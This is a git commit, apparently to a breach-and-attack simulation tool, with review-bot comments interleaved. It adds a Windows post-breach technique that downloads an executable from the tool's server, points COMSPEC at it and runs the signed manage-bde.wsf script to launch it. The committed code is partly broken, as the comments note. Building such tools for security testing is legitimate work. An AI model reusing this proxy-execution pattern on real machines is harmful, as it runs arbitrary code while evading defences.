Code review changes
- smaller executable file; fetches it from the island when pba needs to run - technique configured off by default - other implementation changes
This commit is contained in:
parent
59f9752faf
commit
4b664031af
@ -325,6 +325,16 @@ class ControlClient(object):
except requests.exceptions.RequestException:
return False
@staticmethod
def get_T1216_pba_file():
try:
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
stream=True)
except requests.exceptions.RequestException:
return False
@staticmethod
def should_monkey_run(vulnerable_port: str) -> bool:
if vulnerable_port and \
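Review bot: get_T1216_pba_file() returns the Response without checking its status code, so an island error response (a 404 or 500 body) is handed to the caller as if it were the executable, and on a request error it returns False, which the windows signed_script_proxy module in this commit uses directly as a context manager (`with ControlClient.get_T1216_pba_file() as r:`) and would fail on. Because requests.HTTPError is a RequestException, a status check fits inside the existing try: `response = requests.get(...)`, `response.raise_for_status()`, `return response`. The caller should then also test the return value before entering the with block. The ControlClient class continues outside the hunk.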
@ -1,7 +1,10 @@
import subprocess
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
from infection_monkey.post_breach.pba import PBA
from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import (
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
from infection_monkey.utils.environment import is_windows_os
class SignedScriptProxyExecution(PBA):
@ -10,4 +13,12 @@ class SignedScriptProxyExecution(PBA):
super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC,
windows_cmd=' '.join(windows_cmds))
cleanup_changes()
def run(self):
original_comspec = ''
if is_windows_os():
original_comspec =\
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
super().run()
cleanup_changes(original_comspec)
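Review bot: cleanup_changes(original_comspec) at the end of run() only executes when super().run() returns normally, so an exception raised while the PBA runs leaves COMSPEC pointing at the dropped executable; the reset belongs in a finally block. The captured value is also not stripped, so the `\r\n` that `echo` appends is carried into `set comspec={original_comspec}` in cleanup_changes (the windows module in this commit strips '\r\n' for the same kind of read), which may not restore the original value as intended. The same value handling applies to cleanup_changes and get_windows_commands_to_reset_comspec in the following hunks. SignedScriptProxyExecution's __init__ starts outside the hunk.
```python
    def run(self):
        original_comspec = ''
        if is_windows_os():
            original_comspec = \
                subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode().strip('\r\n')  # noqa: DUO116
        try:
            super().run()
        finally:
            # restore COMSPEC even if the PBA raised
            cleanup_changes(original_comspec)
```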
@ -11,6 +11,6 @@ def get_commands_to_proxy_execution_using_signed_script():
return windows_cmds
def cleanup_changes():
def cleanup_changes(original_comspec):
if is_windows_os():
subprocess.run(get_windows_commands_to_reset_comspec(), shell=True) # noqa: DUO116
subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116
Binary file not shown.
@ -1,16 +1,25 @@
import subprocess
from pathlib import Path
ORIGINAL_COMSPEC = r'C:\Windows\System32\cmd.exe'
from infection_monkey.control import ControlClient
def get_windows_commands_to_proxy_execution_using_signed_script():
global ORIGINAL_COMSPEC
ORIGINAL_COMSPEC = subprocess.check_output('echo %COMSPEC%', shell=True).decode() # noqa: DUO116
# temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
# temp_comspec = Path(*temp_comspec_path)
with ControlClient.get_T1216_pba_file() as r:
with open(temp_comspec, 'wb') as f:
shutil.copyfileobj(r.raw, f)
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
signed_script = Path(*signed_script_path)
return [
r'set comspec=infection_monkey\post_breach\signed_script_proxy\windows\random_executable.exe &&',
r'cscript C:\Windows\System32\manage-bde.wsf'
f'set comspec={temp_comspec} &&',
f'cscript {signed_script}'
]
def get_windows_commands_to_reset_comspec():
return f'set comspec={ORIGINAL_COMSPEC}'
def get_windows_commands_to_reset_comspec(original_comspec):
return f'set comspec={original_comspec}'
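Review bot: get_windows_commands_to_proxy_execution_using_signed_script() references temp_comspec in the open() call and in the f-string command, but the two lines that define it are commented out just above, and shutil.copyfileobj is called while the import block at the top of the hunk never imports shutil, so the function raises NameError before producing any command. The download is also entered as a context manager with no status check, and get_T1216_pba_file() returns False on a request error, so a failed or refused download is either written to disk verbatim and then installed as COMSPEC, or fails with an unrelated AttributeError. Restoring the two commented lines, adding `import shutil` next to `import subprocess`, and checking the response before writing addresses all three. cleanup_changes in this commit only resets COMSPEC, so the dropped random_executable.exe stays on disk after the PBA runs — worth removing in cleanup or stating in a comment.
```python
def get_windows_commands_to_proxy_execution_using_signed_script():
    temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
    temp_comspec = Path(*temp_comspec_path)
    response = ControlClient.get_T1216_pba_file()
    if not response:  # ControlClient returns False when the request itself failed
        raise RuntimeError('could not download the T1216 executable from the island')
    with response as r:
        r.raise_for_status()  # never write an error body to disk and point COMSPEC at it
        with open(temp_comspec, 'wb') as f:
            shutil.copyfileobj(r.raw, f)

    # … unchanged: windir_path / signed_script resolution and the returned command list …
```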
@ -35,6 +35,8 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload
from monkey_island.cc.resources.remote_run import RemoteRun
from monkey_island.cc.resources.reporting.report import Report
from monkey_island.cc.resources.root import Root
from monkey_island.cc.resources.T1216_pba_file_download import \
T1216PBAFileDownload
from monkey_island.cc.resources.telemetry import Telemetry
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
from monkey_island.cc.resources.test.clear_caches import ClearCaches
@ -130,6 +132,7 @@ def init_api_resources(api):
api.add_resource(Log, '/api/log', '/api/log/')
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
'/api/fileUpload/<string:file_type>?load=<string:filename>',
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
@ -0,0 +1,15 @@
from pathlib import Path
import flask_restful
from flask import send_from_directory
class T1216PBAFileDownload(flask_restful.Resource):
"""
File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
"""
def get(self):
executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
executable_file = Path(*executable_file_path)
return send_from_directory(executable_file)
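Review bot: `send_from_directory(executable_file)` passes a single Path, but Flask's send_from_directory takes the directory and the file name as two separate arguments, so this handler raises TypeError on every request instead of serving the file. Split the constant: `executable_dir = Path('monkey_island', 'cc', 'resources', 'pba')` and `return send_from_directory(str(executable_dir), 'T1216_random_executable.exe')`. The relative path is resolved against the island process's working directory, presumably the repository root — worth anchoring on `Path(__file__)` or confirming in a comment. No authentication decorator is visible on get(); if that is intentional because the agent fetching the file cannot authenticate, the class docstring should say so.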
Binary file not shown.
@ -189,7 +189,7 @@ SCHEMA = {
"T1216": {
"title": "Signed script proxy execution",
"type": "bool",
"value": True,
"value": False,
"necessary": False,
"link": "https://attack.mitre.org/techniques/T1216",
"description": "Adversaries may use scripts signed with trusted certificates to "
@ -7,9 +7,9 @@ __author__ = "shreyamalviya"
class T1216(PostBreachTechnique):
tech_id = "T1216"
unscanned_msg = "Monkey didn't attempt to execute an arbitrary file with the help of a " +\
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
"pre-existing signed script since it didn't run on any Windows machines."
scanned_msg = "Monkey attempted to execute an arbitrary file with the help of a " +\
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
"pre-existing signed script on Windows but failed."
used_msg = "Monkey executed an arbitrary file with the help of a pre-existing signed script on Windows."
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
@ -67,8 +67,7 @@ MONKEY = {
"HiddenFiles",
"TrapCommand",
"ChangeSetuidSetgid",
"ScheduleJobs",
"SignedScriptProxyExecution"
"ScheduleJobs"
]
},
}